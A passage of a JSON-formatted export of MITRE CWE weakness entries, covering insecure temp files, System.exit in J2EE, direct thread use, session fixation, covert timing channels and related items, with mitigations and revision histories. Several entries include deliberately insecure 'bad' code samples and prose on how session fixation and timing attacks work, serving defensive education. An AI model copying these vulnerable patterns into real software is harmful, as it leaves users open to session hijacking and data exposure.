\\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Guessed or visible temporary file"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Temporary Files&#34;, Page 538"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Guessed or Visible Temporary File","attr":{"@_Date":"2008-04-11"}},{"#text":"Creation of Temporary File in Directory with Insecure Permissions","attr":{"@_Date":"2009-05-27"}},{"#text":"Creation of Temporary File in Directory with Incorrect Permissions","attr":{"@_Date":"2020-02-24"}}]}},"382":{"attr":{"@_ID":"382","@_Name":"J2EE Bad Practices: Use of System.exit()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A J2EE application uses System.exit(), which also shuts down its container.","Extended_Description":"It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A call to System.exit() is probably part of leftover debug code or code imported from a non-J2EE application."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"The shutdown function should be a privileged function available only to a properly authorized administrative user"},{"Phase":"Implementation","Description":"Web applications should not call methods that cause the virtual machine to exit, such as System.exit()"},{"Phase":"Implementation","Description":"Web applications should also not throw any Throwables to the application server as this may adversely affect the container."},{"Phase":"Implementation","Description":"Non-web applications may have a main() method that contains a System.exit(), but generally should not call System.exit() from other locations in the code"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());System.exit(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: System.exit()"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR09-J","Entry_Name":"Do not allow untrusted code to terminate the JVM"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: System.exit()","attr":{"@_Date":"2008-04-11"}}}},"383":{"attr":{"@_ID":"383","@_Name":"J2EE Bad Practices: Direct Use of Threads","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Thread management in a Web application is forbidden in some circumstances and is always highly error prone.","Extended_Description":"Thread management in a web application is forbidden by the J2EE standard in some circumstances and is always highly error prone. Managing threads is difficult and is likely to interfere in unpredictable ways with the behavior of the application container. Even without interfering with the container, thread management usually leads to bugs that are hard to detect and diagnose like deadlock, race conditions, and other synchronization errors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"For EJB, use framework approaches for parallel execution, instead of using threads."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a new Thread object is created and invoked directly from within the body of a doGet() method in a Java servlet.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Runnable r = new Runnable() {};new Thread(r).start();","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Create a new thread to handle background processing."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Process and store request statistics."}}}}}}}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Threads"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"J2EE Bad Practices: Threads","attr":{"@_Date":"2008-01-30"}},{"#text":"J2EE Bad Practices: Use of Threads","attr":{"@_Date":"2008-04-11"}}]}},"384":{"attr":{"@_ID":"384","@_Name":"Session Fixation","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.","Extended_Description":{"xhtml:p":"Such a scenario is commonly observed when:","xhtml:ol":{"xhtml:li":["A web application authenticates a user without first invalidating the existing session, thereby continuing to use the session already associated with the user.","An attacker is able to force a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session.","The application or container uses predictable session identifiers. In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user\'s account through the active session."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"472","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate any existing session identifiers prior to authorizing a new user session."},{"Phase":"Architecture and Design","Description":"For platforms such as ASP that do not generate new values for sessionid cookies, utilize a secondary cookie. In this approach, set a secondary cookie on the user\'s browser to a random value and set a session variable to the same value. If the session variable and the cookie value ever don\'t match, invalidate the session, and force the user to log on again."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void auth(LoginContext lc, HttpSession session) throws LoginException {}","xhtml:div":{"#text":"...lc.login();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim\'s active session, providing nearly unrestricted access to the victim\'s account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal.","In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker.","In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim\'s browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]."]},{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the &lt;code&gt;j_security_check&lt;/code&gt;, which typically does not invalidate the existing session before processing the login request.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form method=\\"POST\\" action=\\"j_security_check\\"&gt;&lt;/form&gt;","xhtml:div":{"#text":"&lt;input type=\\"text\\" name=\\"j_username\\"&gt;&lt;input type=\\"text\\" name=\\"j_password\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Session Fixation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":37,"Entry_Name":"Session Fixation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim\'s network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}]}},"385":{"attr":{"@_ID":"385","@_Name":"Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information.","Extended_Description":{"xhtml:p":["In some instances, knowing when data is transmitted between parties can provide a malicious user with privileged information. Also, externally monitoring the timing of operations can potentially reveal sensitive data. For example, a cryptographic operation can expose its internal state if the time it takes to perform the operation varies, based on the state.","Covert channels are frequently classified as either storage or timing channels. Some examples of covert timing channels are the system\'s paging rate, the time a certain transaction requires to execute, and the time it takes to gain access to a shared bus."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Application Data","Other"],"Note":"Information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Whenever possible, specify implementation strategies that do not introduce time variances in operations."},{"Phase":"Implementation","Description":"Often one can artificially manipulate the time which operations take or -- when operations occur -- can remove information from the attacker."},{"Phase":"Implementation","Description":"It is reasonable to add artificial or random delays so that the amount of CPU time consumed is independent of the action being taken by the application."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the attacker observes how long an authentication takes when the user types in the correct password.","Body_Text":["When the attacker tries their own values, they can first try strings of various length. When they find a string of the right length, the computation will take a bit longer, because the for loop will run at least once. Additionally, with this code, the attacker can possibly learn one character of the password at a time, because when they guess the first character right, the computation will take longer than a wrong guesses. Such an attack can break even the most sophisticated password with a few hundred guesses.","Note that, in this example, the actual password must be handled in constant time, as far as the attacker is concerned, even if the actual password is of an unusual length. This is one reason why it is good to use an algorithm that, among other things, stores a seeded cryptographic one-way hash of the password, then compare the hashes, which will always be of the same length."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def validate_password(actual_pw, typed_pw):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if len(actual_pw) &lt;&gt; len(typed_pw):for i in len(actual_pw):return 1","xhtml:div":[{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}},{"#text":"if actual_pw[i] &lt;&gt; typed_pw[i]:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Timing"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert Timing Channel"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"386":{"attr":{"@_ID":"386","@_Name":"Symbolic Name not Mapping to Correct Object","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"367","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"486","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The attacker can gain access to otherwise unauthorized resources."},{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Read Application Data","Read Files or Directories","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"The resource in question, or other resources (through the corrupted one) may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Integrity"],"Impact":"Modify Files or Directories","Note":"In some cases it may be possible to delete files that a malicious user might not otherwise have access to -- such as log files."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Symbolic name not mapping to correct object"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"390":{"attr":{"@_ID":"390","@_Name":"Detection of Error Condition Without Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software detects a specific error, but takes no actions to handle the error.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"401","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"],"Note":"An attacker could utilize an ignored error condition to place the system in an unexpected state that could lead to the execution of unintended logic and could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly handle each exception. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."},{"Phase":"Implementation","Description":"If a function returns an error, it is important to either fix the problem and try again, alert the user that an error has happened and let the program continue, or alert the user and close and cleanup the program."},{"Phase":"Testing","Description":"Subject the software to extensive testing to discover some of the possible instances of where/how errors or return values are not handled. Consider testing techniques such as ad hoc, equivalence partitioning, robustness and fault tolerance, mutation, and fuzzing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function 